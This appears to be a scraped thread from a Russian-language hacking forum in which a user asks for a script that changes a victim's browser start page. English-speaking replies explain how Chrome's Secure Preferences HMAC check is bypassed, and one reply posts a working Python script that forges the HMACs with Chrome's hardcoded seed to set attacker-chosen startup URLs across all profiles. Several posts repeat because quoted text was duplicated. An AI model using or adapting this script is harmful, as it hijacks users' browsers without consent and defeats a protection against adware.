Подскажите готовые решения или готов заплатить за реализацию
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Скрипт подмены стартовой страницы в браузере
- Автор темы rest4goo
- Дата начала
Since you don't specify an operating system or browser combination you'd like to target, I'll assume the default scenario of attacking Chrome on Windows 10. This assumption is unfortunate because some alternative combos, for example, Firefox on Linux, make this as easy as changing a line in a config file.
It used to be the case that things were so simple on Windows as well - just switch a setting in C:\Users\YOUR USER\AppData\Local\Google\Chrome\User Data\Default\Preferences and viola, we've programmatically set our new startup page URL! Things are no longer quite so easy. You will also read some PowerShell scripts online which do this via the registry. That also will not work (unless you are configuring GPO and the machine is hooked up to an AD domain and all that, but that is a separate scenario that I doubt describes you, so we'll assume that doesn't apply here. The point is, running those scripts on a normal machine will be of no use)
So what is the problem? In order to prevent malware from manipulating preferences maliciously and only allow the browser itself to make these changes to the relevant config files, all preferences deemed important for security are stored in the new SecurityPreferences file (in the same directory as the Preferences file mentioned before) along with a custom HMAC SHA256 algo based hash of the setting signed with the browser's private key. At startup, Chrome then verifies all the hashes and if something doesn’t match it asks for a restore.
Of course, we can get the secret key ourselves, reverse engineer Chromium's open source HMAC based algo, and so on, so that we can implement a real hash. In fact, a great blog post from a whitehat explaining how to do this can be from here: https://www.adlice.com/google-chrome-secure-preferences/
As that blog post mentions, there is already malware in the wild that does exactly this, such as Trotux/Elex. Another example, not mentioned in the post, is BrowserEnhancer. But there are zillions more, for the adware crowd this is a basic tactic.
Another way adware can accomplish this is by editing the source code of the browser itself to simply not perform the HMAC integrity check. According to the whitehat at https://www.microsoft.com/security/...nto-search-results-affects-multiple-browsers/
Haha, glorious! I haven't tried this, maybe it doesn't actually work now (although something very similar should with some updates). But the HMAC method definitely still works. Here's a paper explaining exactly how to do it: https://www.cse.chalmers.se/~andrei/cans20.pdf
And the code to calculate the HMAC seed, from the paper: https://github.com/Pica4x6/SecurePreferencesFile/blob/main/windows.py
The point is: this isn't super trivial for two reasons: 1) the adware people don't want to share hard work for free with their competition and 2) the white hats don't want to be too helpful to the adware folks.
I'd be happy to implement an open-source solution that does this if there's enough interest
Oh, and sorry I don't speak Russian. I know, I know, it's a Russian forum and I need to learn. But the English forums are all complete trash in comparison to the wondrous runet. So please forgive me. Besides, nationality is a bourgeois fiction!
It used to be the case that things were so simple on Windows as well - just switch a setting in C:\Users\YOUR USER\AppData\Local\Google\Chrome\User Data\Default\Preferences and viola, we've programmatically set our new startup page URL! Things are no longer quite so easy. You will also read some PowerShell scripts online which do this via the registry. That also will not work (unless you are configuring GPO and the machine is hooked up to an AD domain and all that, but that is a separate scenario that I doubt describes you, so we'll assume that doesn't apply here. The point is, running those scripts on a normal machine will be of no use)
So what is the problem? In order to prevent malware from manipulating preferences maliciously and only allow the browser itself to make these changes to the relevant config files, all preferences deemed important for security are stored in the new SecurityPreferences file (in the same directory as the Preferences file mentioned before) along with a custom HMAC SHA256 algo based hash of the setting signed with the browser's private key. At startup, Chrome then verifies all the hashes and if something doesn’t match it asks for a restore.
Of course, we can get the secret key ourselves, reverse engineer Chromium's open source HMAC based algo, and so on, so that we can implement a real hash. In fact, a great blog post from a whitehat explaining how to do this can be from here: https://www.adlice.com/google-chrome-secure-preferences/
As that blog post mentions, there is already malware in the wild that does exactly this, such as Trotux/Elex. Another example, not mentioned in the post, is BrowserEnhancer. But there are zillions more, for the adware crowd this is a basic tactic.
Another way adware can accomplish this is by editing the source code of the browser itself to simply not perform the HMAC integrity check. According to the whitehat at https://www.microsoft.com/security/...nto-search-results-affects-multiple-browsers/
Haha, glorious! I haven't tried this, maybe it doesn't actually work now (although something very similar should with some updates). But the HMAC method definitely still works. Here's a paper explaining exactly how to do it: https://www.cse.chalmers.se/~andrei/cans20.pdf
And the code to calculate the HMAC seed, from the paper: https://github.com/Pica4x6/SecurePreferencesFile/blob/main/windows.py
The point is: this isn't super trivial for two reasons: 1) the adware people don't want to share hard work for free with their competition and 2) the white hats don't want to be too helpful to the adware folks.
I'd be happy to implement an open-source solution that does this if there's enough interest
Oh, and sorry I don't speak Russian. I know, I know, it's a Russian forum and I need to learn. But the English forums are all complete trash in comparison to the wondrous runet. So please forgive me. Besides, nationality is a bourgeois fiction!
Привет всем!
Fellow foreigner here, just chiming in that I was able to turn the research done by severaltoes into a quick script that does what OP wants. Caveat - this script only works against Chrome on Windows. It's easy to port to Mac, or other Chromium based browsers, though.
The reason the above script only attacks Chrome (and not, say, Brave or Edge) is because Chrome's seed is stable across systems and hardcoded, whereas other Chromium based browsers dynamically generated seeds. But calculating the seed yourself, or acquiring it from the installed browser on the system, is super easy.
The above script is a good start, though.
Sigh. I'm learning Russian, too. Slowly, haha. Such a marvelous culture, history, language, and of course the best hackers in the world. Really great people. Although I do worry about being an annoyance, since I'm posting on a Russian forum in a foreign language.
I think that since we are, so to speak, linguistic guests, the burden is on us to be helpful and courteous. This is not our home, and we were not asked to come. Nevertheless, that doesn't mean we can't contribute and have a positive presence in the community. After all, we're all here to learn
Fellow foreigner here, just chiming in that I was able to turn the research done by severaltoes into a quick script that does what OP wants. Caveat - this script only works against Chrome on Windows. It's easy to port to Mac, or other Chromium based browsers, though.
Python:
STARTUP_URL = 'https://xss.pro'
import subprocess, getpass, os, json, hmac, hashlib
system_user = getpass.getuser()
chrome_data_dir = f'C:\\Users\\{system_user}\\AppData\\Local\\Google\\Chrome\\User Data'
chrome_profiles = [p for p in os.listdir(chrome_data_dir) if p.startswith('Profile ') or p == 'Default']
sid_cmd = f"wmic useraccount where name='{system_user}' get sid"
sid_cmd_output = subprocess.check_output(sid_cmd.split())
sid = sid_cmd_output.strip().split()[-1][:-5].decode()
seed = b'\xe7H\xf36\xd8^\xa5\xf9\xdc\xdf%\xd8\xf3G\xa6[L\xdffv\x00\xf0-\xf6rJ*\xf1\x8a!-&\xb7\x88\xa2P\x86\x91\x0c\xf3\xa9\x03\x13ihq\xf3\xdc\x05\x8270\xc9\x1d\xf8\xba\\O\xd9\xc8\x84\xb5\x05\xa8'
for profile in chrome_profiles:
secure_preferences_path = f'{chrome_data_dir}\\{profile}\\Secure Preferences'
with open(secure_preferences_path, 'r', encoding='utf8') as secure_preferences_file:
data = json.load(secure_preferences_file)
corrected_data = {'restore_on_startup' : 4, 'startup_urls' : [STARTUP_URL]}
if 'session' not in data:
data['session'] = {}
for k, v in corrected_data.items():
data['session'][k] = v
message = sid + f'session.{k}' + json.dumps(v, separators=(',', ':'), ensure_ascii=False)
hmac_hash = hmac.new(seed, message.encode("utf-8"), hashlib.sha256).hexdigest().upper()
data['protection']['macs']['session'][k] = hmac_hash
json.dump(data, open(secure_preferences_path, 'w'))The reason the above script only attacks Chrome (and not, say, Brave or Edge) is because Chrome's seed is stable across systems and hardcoded, whereas other Chromium based browsers dynamically generated seeds. But calculating the seed yourself, or acquiring it from the installed browser on the system, is super easy.
The above script is a good start, though.
Sigh. I'm learning Russian, too. Slowly, haha. Such a marvelous culture, history, language, and of course the best hackers in the world. Really great people. Although I do worry about being an annoyance, since I'm posting on a Russian forum in a foreign language.
I think that since we are, so to speak, linguistic guests, the burden is on us to be helpful and courteous. This is not our home, and we were not asked to come. Nevertheless, that doesn't mean we can't contribute and have a positive presence in the community. After all, we're all here to learn